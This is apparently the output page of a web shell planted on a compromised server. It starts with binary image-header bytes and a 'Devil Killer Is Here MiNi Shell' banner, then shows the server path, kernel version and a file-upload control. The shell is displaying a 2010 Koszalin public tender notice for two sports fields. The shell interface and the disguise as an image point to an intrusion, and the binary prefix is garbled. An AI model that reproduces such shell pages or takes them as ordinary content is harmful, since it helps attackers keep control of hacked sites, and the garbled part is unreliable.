JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100518/126217-N-2010.html

<p class="kh_header"><b>Koszalin: Budowa  boisk sportowych  w ramach programu Moje  boisko - Orlik 2012:
Zadanie I:    Budowa boisk sportowych przy Szkole Podstawowej  nr 4, ul. Podgórna 46 w Koszalinie 
Zadanie II: Budowa boisk sportowych  przy ul. Orlików - Jamno w Koszalinie</b><br>
<b>Numer ogłoszenia: 126217 - 2010; data zamieszczenia: 18.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Koszalin , Rynek Staromiejski 6-7, 75-007 Koszalin, woj. zachodniopomorskie, tel. 094 3488600, faks 094 3488625.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koszalin.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa  boisk sportowych  w ramach programu Moje  boisko - Orlik 2012:
Zadanie I:    Budowa boisk sportowych przy Szkole Podstawowej  nr 4, ul. Podgórna 46 w Koszalinie 
Zadanie II: Budowa boisk sportowych  przy ul. Orlików - Jamno w Koszalinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa  boisk sportowych  w ramach programu Moje  boisko - Orlik 2012

ZADANIE I BUDOWA BOISK SPORTOWYCH PRZY SZKOLE PODSTAWOWEJ NR 4,                       UL. PODGÓRNA 46  W KOSZALINIE 

Zakres robót obejmuje
1	Rozebranie istniejących nawierzchni utwardzonych z wywozem i utylizacją materiałów pochodzących z rozbiórki
2	Budowę boiska do piłki nożnej o wymiarach
          30,0m x 62,0m o powierzchni 1860 m2 pole gry 26,0m x 56,0m
	podbudowa przepuszczalna 
	nawierzchnia do piłki nożnej - sztuczna trawa
Nawierzchnia syntetyczna typu sztuczna trawa o właściwościach i technologii układania określonych w dokumentacji projektowej  i SST  wysokość włókna min. 60 mm na podbudowie z kruszywa wypełnienie trawy zgodnie z badaniem specjalistycznego laboratorium np. Labosport
1.	Typ włókna- monofil,
2.	Skład chemiczny włókna, polietylen,
3.	Ciężar włókna- min. 11.000 Dtex,
4.	Gęstość trawy- min. 97.000 włókien na m2.
- obrzeża betonowe na ławie betonowej oddzielające sąsiednie elementy terenu 
od płyty boiska. 
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji technicznej.
Roboty należy wykonać zgodnie z dokumentacją projektową i SST 
- wyposażenie
- bramki aluminiowe mocowane w tulejach					- 2 sztuki
- siatki do bramek                                        					- 2 sztuki
3 Budowę boiska wielofunkcyjnego o wymiarach
19,1m x 32,1m o powierzchni 613,11 m2 pole gry 15,1m x 28,1m
	podbudowa
- podbudowa przepuszczalna
Wszystkie elementy  zgodne z  właściwościami określonymi w dokumentacji projektowej 
Roboty należy wykonać zgodnie z dokumentacją projektową  i SST 		
	nawierzchnia boiska wielofunkcyjnego
Nawierzchnia poliuretanowa o właściwościach i technologii układania określonych 
w dokumentacji projektowej  i SST. 
	Technologia układania nawierzchni: 
Technologia typu EPDM - nawierzchnia gładka, przepuszczalna dla wody, wykonana dwuwarstwowo. W przypadku zastosowania podbudowy przepuszczalnej nawierzchnie tego typu należy wykonać na podbudowie elastycznej typu ET o grubości min. 30 mm. Dolna warstwa z granulatu  SBR min 7 mm, górna warstwa wykonana z kolorowego granulatu EPDM min. 7 mm.
	wyposażenie do piłki koszykowej
- obręcz do koszykówki standard i siatka do obręczy		  	- 2 sztuki
- tablica do koszykówki epoksydowa o wym. 105 x 180cm			- 2 sztuki
- mechanizm regulacji wysokości 						- 2 sztuki
- konstrukcja do koszykówki dwusłupowa, montowana w tulejach 	- 2 sztuki
	wyposażenie  do piłki siatkowej
- słupki do siatkówki, aluminiowe, 
wielofunkcyjne - badminton, tenis, siatkówka				- 2 sztuki
- siatka do siatkówki 								- 1 sztuka
4 Dostawę sprzętu sportowego do siatkówki, piłki nożnej i koszykówki
5  Budowę budynku zaplecza boisk sportowych - w technologii tradycyjnej wg załączonej dokumentacji.
6 Dostawę i montaż piłkochwytu z siatki PP o wys. 6,00 m za bramkami
7 Wykonanie ogrodzenia systemowego boisk o wys. 4,08 m spełniającego funkcję piłkochwytów o zwiększonej wytrzymałości, odporne na obciążenia od uderzeń piłki oraz tłumiące hałas  z 1 bramą  i 2 furtkami
8 Wykonanie ogrodzenia terenu o wysokości 2,00 m z bramą wjazdową oraz 3 furtkami
9 Wykonanie żelbetowej ściany oporowej 
10 Wykonanie nawierzchni utwardzonej z kostki betonowej gr. 8cm kolor szary na podbudowie z kruszywa łamanego wraz  z obrzeżami betonowymi
11Wykonanie nawierzchni utwardzonej z kostki betonowej gr. 6cm czerwonej wraz 
z montażem obrzeży betonowych
12 Wykonanie schodów na gruncie z obustronną balustradą schodów terenowych
13	Dostawę i montaż ławek i  koszy z fakturą z betonu płukanego
14	Budowę przyłącza instalacji wodociągowej do budynku zaplecza boisk sportowych
15	Budowę przyłącza instalacji kanalizacji sanitarnej do budynku zaplecza boisk sportowych
16	Budowę przyłącza instalacji kanalizacji deszczowej
17	Budowę drenażu odwadniającego  boiska
18	Budowę kablowej linii 0,4 kV zasilającej WLZ zalicznikowej
19	Budowę oświetlenia boisk
-	Kablowa linia oświetleniowa
-	Stalowe maszty oświetleniowe h=10m o średnicy 159/108/86 mm na fundamencie
-	Naświetlacze metalohalogenkowe asymetryczne 400W.
20	Budowę oświetlenia chodnika
-	Kablowa linia oświetleniowa,
-	Słup parkowy stalowy ocynkowany h=4m na fundamencie,
-	Oprawa parkowa wandaloodporna 70W
21	Montaż w budynku zaplecza boisk sportowych - w pomieszczeniu trenera, tablicy TE wyposażonej w zabezpieczenia różnicowoprądowe i nadmiarowoprądowe dla gniazd wtyczkowych, oświetlenia, wentylatorów, kabli grzejnych, grzejników.
Dodatkowo należy zamontować tablicę sterującą oświetleniem boisk.
22 Wykonawca wykona i zamontuje tablicę informacyjną o realizacji zadania zgodnie                  z programem Moje boisko - Orlik 2012

ZADANIE II   BUDOWA BOISK SPORTOWYCH  PRZY UL. ORLIKÓW - JAMNO W KOSZALINIE 

Zakres robót obejmuje
1 Budowę boiska do piłki nożnej o wymiarach 
 30,0m x 62,0m o powierzchni 1860 m2 pole gry 26,0m x 56,0m
	podbudowa przepuszczalna 
	nawierzchnia do piłki nożnej - sztuczna trawa
Nawierzchnia syntetyczna typu sztuczna trawa o właściwościach i technologii układania określonych w dokumentacji projektowej i SST wysokość włókna min. 60 mm na podbudowie z kruszywa wypełnienie trawy zgodnie z badaniem specjalistycznego laboratorium np. Labosport 
1	Typ włókna- monofil
2	Skład chemiczny włókna- polietylen
3	Ciężar włókna- min. 11.000 Dtex,
4	Gęstość trawy- min. 97.000 włókien na m2
- obrzeża betonowe na ławie betonowej oddzielające sąsiednie elementy terenu 
od płyty boiska 
Wszystkie elementy zgodne z właściwościami określonymi w dokumentacji technicznej.
Roboty należy wykonać zgodnie z dokumentacją projektową  i SST  
- wyposażenie
- bramki aluminiowe mocowane w tulejach					- 2 sztuki
- siatki do bramek                                        					- 2 sztuki
 2 Budowę boiska wielofunkcyjnego o wymiarach
19,1m x 32,1m o powierzchni 613,11 m2 pole gry 15,1m x 28,1m
	podbudowa
- podbudowa przepuszczalna
Wszystkie elementy  zgodne z  właściwościami określonymi w dokumentacji projektowej.
Roboty należy wykonać zgodnie z dokumentacją projektową  i SST.  		
	nawierzchnia boiska wielofunkcyjnego
Nawierzchnia poliuretanowa o właściwościach i technologii układania określonych 
w dokumentacji projektowej  i SST 
	Technologia układania nawierzchni: 
Technologia typu EPDM - nawierzchnia gładka, przepuszczalna dla wody, wykonana dwuwarstwowo. W przypadku zastosowania podbudowy przepuszczalnej nawierzchnie tego typu należy wykonać na podbudowie elastycznej typu ET o grubości min. 30 mm. Dolna warstwa z granulatu  SBR min 7 mm, górna warstwa wykonana z kolorowego granulatu EPDM min. 7 mm.
	wyposażenie do piłki koszykowej
- obręcz do koszykówki standard i siatka do obręczy		  	- 2 sztuki
- tablica do koszykówki epoksydowa o wym. 105 x 180cm			- 2 sztuki
- mechanizm regulacji wysokości 						- 2 sztuki
- konstrukcja do koszykówki dwusłupowa, montowana w tulejach 	- 2 sztuki
	wyposażenie  do piłki siatkowej
- słupki do siatkówki, aluminiowe, 
wielofunkcyjne badminton, tenis, siatkówka				- 2 sztuki
- siatka do siatkówki 								- 1 sztuka
3    Dostawę sprzętu sportowego do siatkówki, piłki nożnej i koszykówki
4    Demontaż i przeniesienie istniejącego placu zabaw
5    Likwidacja istniejącego oświetlenia terenu
6 Budowę zaplecza boisk sportowych - w technologii tradycyjnej zgodnie                                 z dokumentacją
7  Dostawę i montaż piłkochwytu z siatki PP o wys. 6,00 m za bramkami
8 Wykonanie ogrodzenia systemowego boisk o wys. 4,08 m spełniającego funkcję piłkochwytów o zwiększonej wytrzymałości, odporne na obciążenia od uderzeń piłki oraz tłumiące hałas  z 1 bramą  i 2 furtkami
9	Wykonanie ogrodzenia terenu przy budynku zaplecza o wysokości 2,00 m wraz z bramą wjazdową oraz 2 furtkami
10	Wykonanie nawierzchni utwardzonej z kostki betonowej gr. 8cm kolor szary na podbudowie z kruszywa łamanego wraz  z obrzeżami betonowymi
11	Wykonanie nawierzchni utwardzonej z kostki betonowej gr. 6cm czerwonej wraz 
z montażem obrzeży betonowych
12	Wykonanie schodów na gruncie wraz z obustronną balustradą schodów
13	Dostawę i montaż ławek i koszy z fakturą z betonu płukanego
14	Budowę przyłącza instalacji wodociągowej do budynku zaplecza boisk sportowych
15	Budowę przyłącza instalacji kanalizacji sanitarnej do budynku zaplecza boisk sportowych
16	Budowę instalacji kanalizacji deszczowej
17	Budowę kablowej linii 0,4 kV zasilającej zalicznikowej
18	Budowę oświetlenia boisk
	Kablowa linia oświetleniowa,
	Stalowe maszty oświetleniowe h=10m średnicy 159/108/86mm na fundamencie,
	Naświetlacze metalohalogenkowe asymetryczne o mocy 400W.
19	Budowę oświetlenia placu przy zapleczu boisk sportowych i przy placu zabaw
	Kablowa linia oświetleniowa,
	Słup parkowy stalowy ocynkowany h=4m na fundamencie,
	Oprawa parkowa wandaloodporna 70 W, 
20	Montaż w budynku zaplecza boisk sportowych - w pomieszczeniu trenera, tablicy TE wyposażonej w zabezpieczenia różnicowoprądowe i nadmiarowoprądowe dla gniazd wtyczkowych, oświetlenia, wentylatorów, kabli grzejnych, grzejników.
Dodatkowo należy zamontować tablicę  sterującą oświetleniem boisk.
21 Wykonawca wykona i zamontuje tablicę informacyjną o realizacji zadania zgodnie                  z programem Moje boisko - Orlik 2012


UWAGA dotyczy zadania I i zadania II 

Szczegółowy zakres robót przewidziany do wykonania zawarty jest w dokumentacji  projektowej oraz specyfikacjach technicznych wykonania i odbioru robót, które stanowią załączniki do niniejszej specyfikacji istotnych warunków zamówienia.
Wszystkie nazwy producentów, użyte w załączonych do SIWZ projektach 
i specyfikacjach technicznych wykonania i odbioru robót, są przykładowe i mają na celu wyłącznie wskazanie standardu jakościowego przyjętych systemów i elementów wykonawczych oraz urządzeń.
W procesie realizacji możliwe jest zastosowanie rozwiązań,  równorzędnych technicznie, o takich samych parametrach,  pod warunkiem zachowania standardu jakościowego nie gorszego niż przywołany w dokumentacji, uzgodnionych z Zamawiającym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.21.22.20-4, 45.21.22.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zadanie I 20.000 PLN
zadanie II 20.000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunki jeżeli złoży wraz z ofertą podpisane oświadczenie, że spełnia warunki określone w art. 22 ust. 1 PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeżeli wykaże, że posiada doświadczenie zawodowe, legitymując się wykonaniem zakończone w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, jako wykonawca generalny wykonawca co najmniej jednego zadania odpowiadającego swoim rodzajem przedmiotowi zamówienia o wartości łącznej nie mniejszej niż 1 mln zł brutto, tj. roboty budowlane polegające na budowie boisk sportowych w tym  co najmniej  jednego boiska                             o nawierzchni z trawy syntetycznej wraz z podbudową i jednego boiska                          z nawierzchnią poliuretanową wraz z podbudową. Boiska mogą być wykonane             w ramach jednej lub dwóch umów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia ww. warunki jeżeli złoży wraz z ofertą podpisane oświadczenie, że spełnia warunki określone w art. 22 ust. 1 PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeżeli wykaże, że dysponuje min. 4 osobami zdolnymi do wykonania zamówienia, branża budowlana,  instalacyjna, elektryczna, drogowa zgodnie z wymogami prawa budowlanego w zakresie objętym zamówieniem  i należącymi do Okręgowej Izby  Inżynierów Budownictwa, które będą pełniły funkcje kierownika budowy.

-  Kierownika budowy - 1 osoba - posiadająca uprawnienia do wykonywania samodzielnych funkcji w budownictwie zgodnie z ustawą z dnia 07.07.1994 roku Prawo budowlane tj. Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm. 
i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r., 
w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U.               z 2006 r., Nr 83, poz. 578 ze zm. w specjalności konstrukcyjno-budowlanej w zakresie do kierowania robotami budowlanymi lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w odpowiednim zakresie. 
-  Kierownika robót instalacyjnych - 1 osoba - posiadająca uprawnienia do wykonywania samodzielnych funkcji w budownictwie zgodnie z ustawą              z dnia 07.07.1994 roku Prawo budowlane tj. Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm. i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r., w sprawie samodzielnych funkcji technicznych                         w budownictwie Dz. U. z 2006 r., Nr 83, poz. 578 ze zm. do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych                           i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,       a które uprawniają do pełnienia tych funkcji. 
-  Kierownika robót elektrycznych - 1 osoba - posiadająca uprawnienia do wykonywania samodzielnych funkcji w budownictwie zgodnie z ustawą              z dnia 07.07.1994 roku Prawo budowlane tj. Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm. i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r., w sprawie samodzielnych funkcji technicznych                              w budownictwie Dz. U. z 2006 r., Nr 83, poz. 578 ze zm. do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji. 
-  Kierownika robót drogowych - 1 osoba - posiadająca uprawnienia do wykonywania samodzielnych funkcji w budownictwie zgodnie z ustawą              z dnia 07.07.1994 roku Prawo budowlane tj. Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm. i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 r., w sprawie samodzielnych funkcji technicznych                              w budownictwie Dz. U. z 2006 r., Nr 83, poz. 578 ze zm. do kierowania robotami budowlanymi w specjalności drogowej co najmniej w ograniczonym zakresie lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji 
w odpowiednim zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeżeli wykaże, że posiada środki obrotowe lub zdolność kredytową 
z uwzględnieniem potrącenia na inne zobowiązania umowne w wysokości minimum 500 tys. zł na zadanie I oraz 500 tys. zł na zadanie II w przypadku składania oferty na dwa zadania zapewniając tym zdolność do finansowania robót w trakcie realizacji pomiędzy płatnościami ze strony Zamawiającego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">A.	Dokumenty dotyczące nawierzchni poliuretanowej:
1) Certyfikat lub deklaracja zgodności z normą PN-EN 14877:2008, lub 
aprobata techniczna ITB, lub 
rekomendacja techniczna ITB, lub 
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej nawierzchni np. Labosport, lub dokument równoważny.
2)	Karta techniczna oferowanej nawierzchni, potwierdzona przez jej producenta. 
3)	Atest PZH lub równoważny dla oferowanej nawierzchni.
4)	Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.
B.	Dokumenty dotyczące systemu nawierzchni z trawy syntetycznej:
1)	Aktualny certyfikat FIFA 2 Star dla obiektu wykonanego z oferowanego systemu nawierzchni i raport z badań przeprowadzonych przez laboratorium (Labosport lub ISA-Sport lub Sports Labs Ltd), dotyczący oferowanej nawierzchni, potwierdzający zgodność jej parametrów z FIFA Quality Concept for Football Turf (dostępny na www.FIFA.com)
2)	Certyfikat lub deklaracja zgodności z normą PN-EN 15330-1:2008, lub
aprobata techniczna ITB, lub 
rekomendacja techniczna ITB.
3)	Karta techniczna oferowanej nawierzchni, potwierdzona przez jej producenta.
4)	Atest PZH lub równoważny dla oferowanej nawierzchni i wypełnienia.
5)	Autoryzacja producenta trawy syntetycznej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tę nawierzchnię.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
